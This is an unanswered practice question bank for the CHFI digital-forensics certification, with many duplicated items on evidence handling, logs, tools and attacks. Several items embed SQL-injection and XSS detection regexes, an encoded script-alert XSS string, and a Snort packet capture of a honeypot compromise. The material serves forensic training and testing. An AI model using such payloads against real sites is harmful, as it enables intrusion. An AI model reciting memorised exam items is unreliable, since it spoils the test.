Computer Hacking Forensic Investigator (CHFI) Exam Practice
Which forensic imaging tool is pre-installed on many Linux distributions?
Harry has collected a suspicious executable file from an infected system and seeks to reverse its machine code to instructions written in assembly language. Which tool should he use for this purpose?
Callen, a forensics officer, was tasked with investigating a recent security incident at an organization. To protect the evidence, Callen maintained a logbook of the project to record observations related to the evidence, used tagging to uniquely identify any evidence, and created a chain of custody record. Identify the investigation step performed by Callen in the above scenario.
Which of the following techniques involves the analysis of logs to detect and study an incident that may have already occurred in a network or device?
What does "slack space" refer to in a file system?
Which tool can be used to detect rogue devices on a network?
What does the superblock in Linux define?
The following regular expression can be used for detecting a typical SQL injection attack: /\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix Identify the signature in the above expression that searches for the word “or” with various combinations of its hex values (both uppercase and lowercase combinations).
Which of the following cloud computing threats arises from improper resource isolation, data storage in multiple jurisdictions, and lack of knowledge on jurisdictions?
Which type of attack relies on intercepting and altering communications between two parties?
Which of the following Azure logs are a type of Azure platform logs that record information on the Azure subscription layer as well as the write operations performed on Azure resources?
The file content of evidence files can be viewed using the View Pane. The View pane provides several tabs to view file content. Which of these tabs provides native views of formats supported by Oracle Outside In technology?
As a Computer Hacking Forensic Investigator, you are analyzing an intrusion incident involving fileless malware delivered via a malicious Word document through phishing. What is the most effective step to disrupt the infection chain?
Williams collected evidence, eliminated the root cause, and closed attack vectors. Which phase is this?
Which approach helps identify relay systems and gathers data from forensic events?
Which attack exploits "http" to access unauthorized directories?
Which EDRM stage involves policies to handle/safeguard electronic data?
What field is a lay witness considered an expert in?
In which RAID level is disk mirroring done?
What does ARP stand for?
Which service helps identify the domain of an IP and its point of contact?
What is the main purpose of digital evidence preservation?
What is a cold boot attack?
Which EFS component uses LPC between LSA and the kernel?
In an APT cybercrime investigation involving global devices, what is the most effective method to manage complex digital evidence?
Which tool extracts LM and NTLM password hashes from the SAM database?
What issue arises from mishandling digital evidence during investigation?
Which Cisco IOS mnemonic indicates a packet matched a log rule in an access list?
Which is a live forensics method?
Which Windows registry datatype stores encoded info?
What is the function of a MAC address?
Which ISO standard addresses electronic discovery (eDiscovery)?
Xavier found the attacker used proxies and a fake identity. What challenge does this represent?
What is the primary function of a honeypot?
Which hashing algorithms are used in forensics?
Mike found the crime scene computer was turned off. What should he do?
Which Apache component handles routines and data exchange with clients?
Which tool is commonly used for network traffic analysis?
Which SSD component is volatile and enhances read/write speed?
Which IoT architecture layer contains hardware components like sensors, RFID tags, and readers?
Which eDiscovery method involves creating bit-by-bit forensic images of devices?
What is the maximum length of an MD5 hash?
Which tool is used to create bit-by-bit disk images?
Which tool helps recover deleted emails from Outlook and Thunderbird?
Which file type starts with hex: 25 50 44 46?
What is the role of a digital forensic investigator?
Which tool helps intercept and log network traffic?
Which OWASP risk involves sending untrusted data to an interpreter?
In evidence transfer, do sender and receiver need to record the date and time?
Which password-cracking technique tries every possible combination of characters?
Which cloud service does Kellan use for scheduling interviews with automatic notifications?
What is a primary responsibility of a forensic investigator when handling digital evidence?
What is the difference between hashing and encryption?
Which tool helps in extracting data from a smartwatch for forensic investigation?
Which type of malware replicates itself to spread across systems?
Which protocol is used to securely transfer files over the Internet?
What is the hex equivalent of the character `)` in the URL-encoded string `%3Cscript%3Ealert%28XSS%29%3C%2Fscript%3E`?
Which Azure CLI command is used to provide time-specific read-only access to a snapshot?
Which methodology is best for acquiring volatile data from a live Linux system with limited physical access?
Which investigation step has Kannon performed when securing devices affected during an attack for further investigation?
Which of the following is NOT a common type of digital evidence?
What is the main advantage of using cloud-based forensic tools?
Which log file type contains records of all system events on a Windows machine?
What is the primary function of volatile memory?
Which method do attackers often use to compress, encrypt, or modify a malware executable file to avoid detection?
What type of external attack is performed when an attacker uses deceptive emails to obtain sensitive information?
Which approach helps investigators identify if a system serves as a relay to a hacker and helps gather forensic event data?
In the context of malware analysis, what does a sandbox environment provide?
Which file signature verification utility helps check the integrity of critical files on Windows?
Which of the following is a common type of cyberattack?
What type of malware captures keystrokes?
Identify the correct sequence of steps involved in the forensic acquisition of an Amazon EC2 instance.
Which section of the ACPO Principles of Digital Evidence states that no action should change data that may be relied upon in court?
Identify the malware distribution technique in which attackers use tactics to improve the ranking of malware pages.
Which command is used to delete a file in Linux?
The role of a forensic investigator is to:
Which of the following would NOT typically be acquired during the dead acquisition technique?
Printing under a Windows Computer normally requires which one of the following file types to be created?
For the purpose of cracking password-protected files, Bob initiated a technique that attempts every combination of characters. Identify the technique.
Which protocol is used by networked systems to translate domain names into IP addresses?
Which of the following challenges of cybercrime is demonstrated by an attacker using proxies and a fake identity?
Which of the following commands will help John get the count of all NetBIOS names resolved by broadcast by querying a WINS server?
Which component of an SSD is volatile memory and requires power to retain data?
Kevin used Tor browser for illegal activities. Which type of web was accessed by Kevin?
Which Windows command can list all active processes?
Maria wants to see if an executable file adds or modifies any registry values after execution. Which event ID should she look for in Windows Event Viewer?
Which of the following Azure logs records information on the Azure subscription layer and write operations on Azure resources?
Which online service helps forensic investigators determine the domain name of an IP address and obtain the point of contact for the domain?
Which U.S. law requires financial institutions to protect customer information against security threats?
Which Tor relay is used for transmitting data in an encrypted format and passing it from the entry relay to the exit relay?
Which investigation step did Callen perform by maintaining a logbook, tagging evidence, and creating a chain of custody record?
What activity did James perform by obtaining documented permission from the device owner to conduct the investigation?
Which command allows investigators to mount an APFS image and view its contents on a Linux system?
What methodology is most suitable for acquiring volatile data from a live Linux system with limited physical access?
What obfuscation method did the attacker use by utilizing “%0b” characters to bypass firewall protection?
Which artifact helps an investigator explore the Tor browser when it is uninstalled or installed in a location other than the Windows desktop?
Which is the correct sequence of stages involved in the first response by laboratory forensic staff?
Which dcfldd command is used by investigators to compare an image file to the original medium (like a drive or partition)?
Which technique is used by attackers to confuse and mislead the forensic investigation process, including log tampering, false email headers, timestamp modification, and file header modifications?
In Java, which process enables low memory consumption and quick start-up times by using a single instance of the Dalvik Virtual Machine?
Which registry datatype in a Windows system is used for storing encoded information?
Which of the following is NOT a valid hashing algorithm?
Which technique involves analyzing logs to detect and study an incident that has already occurred in a network or device?
Which aspect of the Tor network should an investigator focus on primarily to trace the origin of a data transmission?
Which registry location stores Tor browser artifacts and can provide information on user activities on the dark web?
In which forensic data acquisition step do investigators overwrite data with sequential zeros or ones to protect it from recovery?
Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?
What is the primary role of a write blocker in digital forensics?
Joey, a forensics analyst, found a security event with Event ID 4758 while analyzing logs. What event did Joey identify?
What is the default port for SSH?
In which step of forensic readiness planning do investigators determine what happens to potential evidence data and its impact on the business?
Which practice is associated with scene assessment in ENFSI best practices for forensic examination?
Which of the following AWS services helps forensic investigators to monitor and analyze various log sources, such as Amazon S3 logs, CloudTrail management event logs, DNS logs, etc., to identify security threats?
Which of the following types of jailbreaks allows users to reboot the iOS device any number of times because after every reboot, the device gets jailbroken automatically?
What is the primary purpose of timestamps in digital forensics?
Identify the `dcfldd` command that investigators use to compare an image file to the original medium, such as a drive or partition.
What is the primary purpose of the tool Cain & Abel in forensic investigations?
Which of the following eDiscovery team members performs the deployment of tools on a suspected computer machine and configures, implements, and maintains the deployed tools?
Identify the correct sequence of steps involved in the forensic acquisition of persistent disk volumes (GCP):
In the `netstat` command, which parameter is used to display active TCP connections and includes the Process ID (PID) for each connection?
Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where 'x' represents the ________.
Which forensic technique is used to reconstruct a file system from damaged storage media?
What does the 'traceroute' command do?
Which Linux command can be used to view all active network connections?
Which of the following PowerPoint streams contains information about the presentation layout and its contents?
Which of the following fields of an IIS log entry can be reviewed to determine whether a request made by a client is fulfilled without an error?
Which Windows command is used to check the IP configuration of a system?
What is the role of the forensic investigator?
What type of analysis is performed when reviewing DNS cache to check domain contact attempts?
Which tool assists investigators in retrieving deleted emails from Outlook and Thunderbird?
Identify the SQLite file that contains logged-in users on Alexa devices and gets cleared upon logout.
Which Azure CLI command provides time-limited read-only access to a snapshot?
Which of the following tools is used for recovering deleted files?
After snapshotting a malware-infected EC2 instance, what should the forensics team do next?
In cases involving APTs, what's the best way to manage complex digital evidence?
Which forensic technique involves hashing and comparing binaries?
Which attack exploits a buffer overflow?
What does TSK stand for in digital forensics?
Which command converts E01 image files to dd format on Linux?
Which is NOT a characteristic of volatile memory?
Which tool allows forensic investigators to perform Apache log analysis?
What is a common tool used for network traffic analysis?
What data acquisition method is used when collecting evidence from a powered-off system?
Which is NOT a common type of digital evidence?
Which of the following is a common cyberattack?
What do security cameras, badges, and fire extinguishers represent in a forensics lab?
The offset in a hexadecimal code is:
Which tool shows related modules in an executable and builds a tree of functions?
Which incident response phase includes eliminating the root cause and closing attack vectors?
What is the right combo of Event IDs for account creation, privilege escalation, and service install?
Which tool identifies file extension mismatches to assist forensic investigations?
Which `nbtstat` command gets the count of NetBIOS names resolved by broadcast?
What does 'anti-forensics' refer to?
Which registry keys track a user's folder viewing preferences?
Which Event ID shows allowed connection via UDP/TCP by Windows Filtering Platform?
Which is a volatile storage medium?
What is the process of recovering deleted files from storage?
What is the smallest allocation unit on a hard disk made up of multiple sectors?
A lay witness is considered an expert in what field?
Which correlation approach compares all fields systematically for both positive and negative matches?
Which event log type is used by batch servers executing processes without user interaction?
Where in the registry are Tor browser artifacts stored?
Which tool helps reverse machine code to assembly?
Which ISO standard covers electronic discovery processes?
What should a forensics team do after taking an EBS snapshot of a compromised EC2 instance?
Which Federal Rule promotes fair trials and efficiency in evidence law?
What's a common method to detect rootkits?
What defines how investigators are expected to act during cases?
What describes an organization’s ability to efficiently handle digital evidence?
What is a common Linux file system?
Which layer in the IoT architecture consists of hardware components, including sensors, RFID tags, and readers?
Which tool allows forensic investigators to extract web activity information such as event timestamp, port, server status code, etc.?
Which component in the Microsoft Excel file structure holds information about each workbook’s features?
Which Apache core element manages routines, interacts with clients, and handles data exchange and socket connections?
Which program allows bundling all files together into a single executable file via compression to bypass security software?
Which approach helps investigators identify if a system serves as a relay for a hacker and gather event data?
Which command allows investigators to mount an image in the APFS format and view its contents on a Linux system?
Which hashing algorithm is commonly used in digital forensics?
Which of the following is a common tool used for network traffic analysis?
What is the purpose of chain of custody documentation?
What is the purpose of the MAC address in a network?
Which layer of the OSI model is responsible for data encryption?
Which of the following is a legal document that demonstrates the progression of evidence from its original location to the forensic laboratory?
Which type of digital data stores a document file on a computer when it is deleted and helps in the process of retrieving the file until that file space is reused?
What is the purpose of hashing in digital forensics?
Which role is played by international agencies when cybercrime crosses state or international borders and requires sharing information and resources with other state agencies?
Which of the following challenges of cybercrime is demonstrated when the attacker hides their IP address using proxies and uses a fake identity for communication?
Which device is responsible for translating internal private IP addresses to a public IP address?
Which of the following practices indicates that an organization is not forensically prepared to maintain business continuity?
Which of the following factors of cloud forensics involves assisting organizations in following appropriate rules and adhering to requirements such as securing critical data, maintaining records for audit, and notifying the parties affected by sensitive data exposure?
Which of the following tools helps Rowen to acquire data remotely?
Identify the process that involves discovering, protecting, collecting, reviewing, and presenting electronically stored information (ESI) during an investigation.
Which stage in the booting process of a Linux system establishes a temporary root file system using the initial RAM disk (initrd) until the real file system is mounted?
Mike, a forensic investigator, finds a computer at the crime scene that is switched off. What should he do?
Which forensic artifact would indicate the last time a user logged in to a system?
What is the primary role of EnCase in digital forensics?
What does ARP stand for in networking?
Thomas, a forensics specialist, was resolving a case related to fake email broadcasting. He retrieved data from the victim system for analysis to find the source of the email server. He extracted only “.ost” files for this purpose. What type of data acquisition did Thomas perform?
What is the purpose of hash functions in digital forensics?
In what scenario would a forensic investigator use the tool Wireshark?
Which of the following registry datatypes in a Windows system is used for storing encoded information?
Which of the following techniques refers to the process of discovering the existence of hidden information within a cover medium?
Which hashing algorithm is widely used in digital forensics?
Which attack technique is the combination of both a brute-force attack and a dictionary attack to crack a password?
Which file system is case-sensitive by default?
Williams, a forensics specialist, analyzed a malware sample in binary format using OllyDbg to identify the language and functions. What malware analysis technique did Williams use?
What is the primary function of the tool Autopsy in digital forensics?
A forensic investigator is analyzing a Windows 10 machine that has crashed several times in the past week. What should be the investigator's most immediate action?
Bob, a forensic expert, wants to examine image files in the E01 format on his Linux machine. Which command can he use to convert the E01-format files into the dd format?
What does a "boot sector" virus target?
What is the name of the process of making a bit-by-bit copy of a digital device?
Bob discovered password-protected files during a forensic investigation and initiated a password-cracking technique that tries every possible combination of characters until the password is cracked. Which technique did Bob use?
Which of the following is a common type of malware that replicates itself?
Which of the following is an 802.11 network discovery tool that gathers information about nearby wireless APs in real-time and displays it in different diagnostic views and charts?
Which of the following is an open-source forensic tool that enables the reliable extraction of the entire contents of a computer’s volatile memory, even if protected by an active anti-debugging or anti-dumping system?
Identify the malware distribution technique using which attackers use tactics such as keyword stuffing, doorway pages, page swapping, and the addition of unrelated keywords to get a higher ranking on the web for their malware pages.
Which of the following is a dedicated high-speed network that provides access to consolidated block-level storage, independent of network traffic?
In the OSI model, at which layer does packet filtering occur?
Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?
What is the main difference between TCP and UDP?
Which of the following is a common tool for analyzing network traffic?
Which of the following issues in computer forensics might arise because of improper handling of evidence during an investigation, making the evidence inadmissible in a court of law?
Which of the following files has 25 50 44 46 as the first characters in hexadecimal representation?
In which RAID level disk mirroring is done?
As a Computer Hacking Forensic Investigator, you are analyzing an intrusion incident involving fileless malware delivered via a malicious Word document. Which step would be most effective to disrupt the infection chain?
What is the role of a swap file in a computer system?
Andrew is performing a UEFI boot process. The current phase consists of initialization code that executes after powering on the system. Which UEFI boot phase is this?
Which process involves the technical methods and organizational measures for discovering, tracing, and inculpating individuals or groups responsible for cyberattacks?
John, a forensic investigator, needs to get the count of all NetBIOS names resolved by broadcast by querying a WINS server. Which command should he use?
Which of the following layers in the IoT architecture consists of all the hardware components, including sensors, RFID tags, and readers, and plays an important part in data collection and connecting devices within the network?
Which hashing algorithm is considered the most secure among the options below?
Since Hillary is a lay witness, what field would she be considered an expert in?
What is a key advantage of forensic imaging over direct analysis?
Which tool is commonly used for sniffing network packets?
Which of the following sections of the (ACPO) Principles of Digital Evidence states that no action taken by law enforcement agencies should change data that may subsequently be relied upon in court?
Which port is used for HTTPS traffic?
Identify the default location in Fedora Linux from which Clark obtained system access logs.
Which of the following U.S. laws requires financial institutions to protect their customers' information against security threats?
Kannon, a forensics specialist, secured affected devices for further investigation. Which investigation step did Kannon perform?
During an investigation, you locate evidence that may prove the innocence of the suspect. What type of evidence is this?
Which of the following tools assists investigators in retrieving deleted email messages from Outlook and Thunderbird email clients?
Which port does FTP use for active data transfer?
Which of the following is a proprietary information security standard for organizations that handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards?
Which of the following tools can be used to analyze network traffic?
What countermeasures could George take to prevent DDoS attacks?
Which feature will you disable to eliminate the ability to enumerate model, OS version, and capabilities on Cisco routers?
Which of the following is an open-source forensics tool that allows investigators to extract and analyze artifacts from PCAP, PcapNG, and ETL packet captures?
What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?
In which of the following attacks does an attacker exploit “http” to gain access to unauthorized directories and execute commands outside the web server’s root directory?
Which type of cyberattack exploits a buffer overflow vulnerability?
Which of the following roles is played by international agencies when cybercrime crosses state or international borders and requires them to share information and resources with other state agencies?
What is the primary purpose of digital evidence preservation?
Which of the following parameters in the Apache common log format represents the client’s IP address?
Which of the following components of EFS is a part of the security subsystem and acts as an interface with the EFS driver by using a local procedure call (LPC) communication port between the local security authority (LSA) and the kernel-mode security reference monitor?
Which of the following is NOT a characteristic of volatile memory?
In digital forensics, which file format is commonly used for creating forensic images of a drive?
Which of the following files in a Windows system helps forensic investigators analyze and identify the historical data for executables run in the system?
Maria has executed a suspicious executable file in a controlled environment and wants to see if the file adds/modifies any registry value after execution via Windows Event Viewer. Which of the following event ID should she look for in this scenario?
Which of the following tools helps investigators expand investigations by allowing the capture of an entire social media account or timeline from which they can search the captured OCR PDF or MHTML file for related content?
Carlos, a forensic analyst, was investigating a system that was compromised earlier. He started the investigation process by extracting the Apache access log entries and searching for malicious HTML tags or their hex equivalents in HTTP requests. Carlos identified some encoded values, such as %3Cscript%3Ealert%28XSS%29%3C%2Fscript%3E in the query string. He assumed it was an XSS attack and decoded them. Which of the following characters represents the hex equivalent %29 in the above scenario?
Select the tool appropriate for finding the dynamically linked lists of an application or malware.
When an investigator contacts by telephone the domain administrator or controller listed by a Who is lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
If you come across a sheepdip machine at your client site, what would you infer?
In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?
You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84 Len: 64 - 01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 . ............. 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 . .............. 00 00 00 11 00 00 00 00 ........ 03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 - 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8
You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating?
What file structure database would you expect to find on floppy disks?
What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?
When examining a file with a Hex Editor, what space does the file header occupy?
In the context of file deletion process, which of the following statement holds true?
A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation?
A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.
It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?
With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.
When examining the log files from a Windows IIS Web Server, how often is a new log file created?
Which part of the Windows Registry contains the user's password file?
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.
Lance wants to place a honeypot on his network. Which of the following would be your recommendations?
What does the acronym POST mean as it relates to a PC?
Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
The MD5 program is used to:
Which is a standard procedure to perform during all computer forensics investigations?
The Recycle Bin exists as a metaphor for throwing files away, but it also allows a user to retrieve and restore files. Once the file is moved to the recycle bin, a record is added to the log file that exists in the Recycle Bin. Which of the following files contains records that correspond to each deleted file in the Recycle Bin?
Before accessing digital evidence from victims, witnesses, or suspects, on their electronic devices, what should the investigator do first to respect legal privacy requirements?
“To ensure that the evidence is collected, preserved, examined, or transferred in a manner safeguarding the accuracy and reliability of the evidence, law enforcement, and forensics organizations must establish and maintain an effective quality system” is a principle established by:
Chloe is a forensic examiner who is currently cracking hashed passwords for a crucial mission and hopefully solve the case. She is using a lookup table used for recovering a plain text password from cipher text; it contains word list and brute-force list along with their computed hash values. Chloe is also using a graphical generator that supports SHA1. (a) What password technique is being used? (b) What tool is Chloe using?
To which phase of the Computer Forensics Investigation Process does the Planning and Budgeting of a Forensics Lab belong?
Gary is checking for the devices connected to USB ports of a suspect system during an investigation. Select the appropriate tool that will help him document all the connected devices.
Which standard is used during a judicial trial to assess whether an expert witness’s scientific testimony is based on scientifically valid reasoning that can adequately be applied (admissible) to the facts under consideration?
Which of the following attacks allows an attacker to access restricted directories, including application source code, configuration, and critical system files, and then execute commands outside of the web server’s root directory?
Which of the following is considered as the starting point of a databases and stores user data and database objects in an MS SQL Server?
Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?
During an investigation, Noel found a SIM card from the suspect's mobile. The ICCID on the card is 8944245252001451548. What does the first four digits (89 and 44) in the ICCID represent?
Which of these Windows utilities helps you to repair logical file system errors?
When analyzing logs, it is important that the clocks of all the network devices are synchronized. Which protocol will help in synchronizing these clocks?
During the course of his investigation, Vincent came across a situation where he needs to run a packet sniffing tool on a Linux-based machine to monitor the network traffic. Which tool should Vincent choose in this case?
Rule 1002 of Federal Rules of Evidence (US) talks about _____
Which of the following applications will allow a forensic investigator to track the user login sessions and user transactions that have occurred on an MS SQL Server?
You are an information security analyst for a national retail chain. The organization has a web server which provides customer reports to internal users for marketing purposes. You are analyzing IIS logs on the web server and find the following log entry: #Software: Microsoft Internet Information Services 7.5 #Version 1.0 #Date 2020-04-28 11:50:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken 2020-04-28 11:50:54 192.168.1.39 GET /Data/Files/customer_report.xlsx 80 – 192.168.1.200 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 200 0 0 54 Based on the contents of this log entry, what occurred?
Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as a part of forensic analysis process. He then created a vhd file out of the snapshot and stored it in a file share and as a page blob as backup in a storage account under different region. What is the next thing he should do as a security measure?
You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a 'simple backup copy' of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a 'simple backup copy' will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?
Sally accessed the computer system that holds trade secrets of the company where she is employed. She knows she accessed it without authorization and all access (authorized and unauthorized) to this computer is monitored. To cover her tracks, Sally deleted the log entries on this computer. What among the following best describes her action?
Which OWASP IoT vulnerability talks about security flaws such as lack of firmware validation, lack of secure delivery, and lack of anti-rollback mechanisms on IoT devices?
Which of the following directories contains the binary files or executables required for system maintenance and administrative tasks on a Linux system?
According to RFC 3227, which of the following is considered as the most volatile item on a typical system?
An investigator enters the command sqlcmd -S WIN-CQQMK62867E -e -s"." -E as part of collecting the primary data file and logs from a database. What does the “WIN-CQQMK62867E” represent?
You are a forensic investigator who is analyzing a hard drive that was recently collected as evidence. You have been unsuccessful at locating any meaningful evidence within the file system and suspect a drive wiping utility may have been used. You have reviewed the keys within the software hive of the Windows registry and did not find any drive wiping utilities. How can you verify that drive wiping software was used on the hard drive?
Jeff is a forensics investigator for a government agency's cybersecurity office. Jeff is tasked with acquiring a memory dump of a Windows 10 computer that was involved in a DDoS attack on the government agency's web application. Jeff is onsite to collect the memory. What tool could Jeff use?
An attacker successfully gained access to a remote Windows system and plans to install persistent backdoors on it. Before that, to avoid getting detected in future, he wants to cover his tracks by disabling the last-accessed timestamps of the machine. What would he do to achieve this?
A forensic examiner encounters a computer with a failed OS installation and the master boot record (MBR) or partition sector damaged. Which of the following tools can find and restore files and information in the disk?
Choose the layer in iOS architecture that provides frameworks for iOS app development?
ISO/IEC 17025 is an accreditation for which of the following?
Recently, an internal web app that a government agency utilizes has become unresponsive. Betty, a network engineer for the government agency, has been tasked to determine the cause of the web application's unresponsiveness. Betty launches Wireshark and begins capturing the traffic on the local network. While analyzing the results, Betty noticed that a SYN flood attack was underway. How did Betty know a SYN flood attack was occurring?
You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?
Examination of a computer by a technically unauthorized person will almost always result in:
“No action taken by law enforcement agencies or their agents should change data held on a computer or storage media which may subsequently be relied upon in court” — this principle is advocated by which of the following?
Which of the following statements is true regarding SMTP Server?
You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?
Debbie has obtained a warrant to search a known pedophile's house. Debbie went to the house and executed the search warrant to seize digital devices that have been recorded as being used for downloading illicit images. She seized all digital devices except a digital camera. Why did she not collect the digital camera?
To understand the impact of a malicious program after the booting process and to collect recent information from the disk partition, an investigator should evaluate the content of the:
Which of the following statements is TRUE about SQL Server error logs?
Assume there is a file named myfile.txt in C: drive that contains hidden data streams. Which of the following commands would you issue to display the contents of a data stream?
A computer forensics investigator or forensic analyst is a specially trained professional who works with law enforcement as well as private businesses to retrieve information from computers and other types of data storage devices. For this, the analyst should have an excellent working knowledge of all aspects of the computer. Which of the following is not a duty of the analyst during a criminal investigation?
Which command can provide the investigators with details of all the loaded modules on a Linux-based system?
Jack is reviewing file headers to verify the file format and hopefully find more information of the file. After a careful review of the data chunks through a hex editor; Jack finds the binary value 0xFFD8. Based on the above information, what type of format is the file/image saved as?
In which IoT attack does the attacker use multiple forged identities to create a strong illusion of traffic congestion, affecting communication between neighboring nodes and networks?
Amber, a black hat hacker, has embedded a malware into a small enticing advertisement and posted it on a popular ad-network that displays across various websites. What is she doing?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads it to VirusTotal in order to confirm whether the file is malicious, provide information about its functionality, and provide information that will allow to produce simple network signatures. What type of malware analysis was performed here?
Netstat is a tool for collecting Information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?
Cybercriminals sometimes use compromised computers to commit other crimes, which may involve using computers or networks to spread malware or illegal information. Which type of cybercrime stops users from using a device or network, or prevents a company from providing a software service to its customers?
This law sets the rules for commercial email, establishes requirements for commercial messages, gives recipients the right to have you stop emailing them, and spells out tough penalties for violations.
Consider a scenario where the perpetrator of a dark web crime has uninstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can investigate it for artifacts of Tor browser usage. Which of the following should the investigators examine to establish the use of Tor browser on the suspect machine?
Which of the following malware targets Android mobile devices and installs a backdoor that remotely installs applications from an attacker-controlled server?
Which layer in the IoT architecture is comprised of hardware parts such as sensors, RFID tags, and devices that play an important role in data collection?
At a trading organization, three employees receive email from a senior official at ABC bank asking them to urgently fill customer-specific details at the bank’s website. As the organization already has a partnership with bank, all the employees visited the website and updated customer-related information, such as their bank account details, confidential documents, and credit card information. After a day, all the concerned customers complained that large amounts of money has been spent using their credit cards and they cannot log into their bank accounts. What kind of attack is this?
Steve thought it would be funny to make some changes on Tom's computer at their office. Steve went into the Microsoft Windows registry and changed the keyboard mapping configuration on Tom’s computer. Now Tom is unable to log into his computer because of the changes. Could Steve’s actions warrant a cybercrime investigation?
Data is striped at a byte level across multiple drives and parity information is distributed among all member drives. What RAID level is represented here?
Brian has the job of analyzing malware for a software security company. Brian has setup a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has setup separated virtual networks within this environment. The virtual environment does not connect to the company's intranet nor does it connect to the external Internet. With everything setup, Brian now received an executable file from client that has undergone a cyberattack. Brian ran the executable file in the virtual environment to see what it would do. What type of analysis did Brian perform?
Frank, a cloud administrator in his company, needs to take backup of the OS disks of two Azure VMs that store business-critical data. Which type of Azure blob storage can he use for this purpose?
During a forensic investigation, a large number of files were collected. The investigator needs to evaluate ownership and accountability of those files. Therefore, he begins to identify attributes such as “author name”, “organization name”, “network name”, or any additional supporting data that is meant for the owner’s identification purpose. Which term describes these attributes?
Simona has written a regular expression for the detection of web application-specific attack attempt that reads as /((\%3C)|<)((\%2F)| V)*[a-z0-9\%]+((\%3E)|>)/ix. Which of the following does the part ((\%3E)|>) look for?
An investigator is checking a Cisco firewall log that reads as follows: Aug 21 2019 09:16:44: %ASA-1 -106021: Deny ICMP reverse path check from 10.0.0.44 to 10.0.0.33 on interface outside What does %ASA-1-106021 denote?
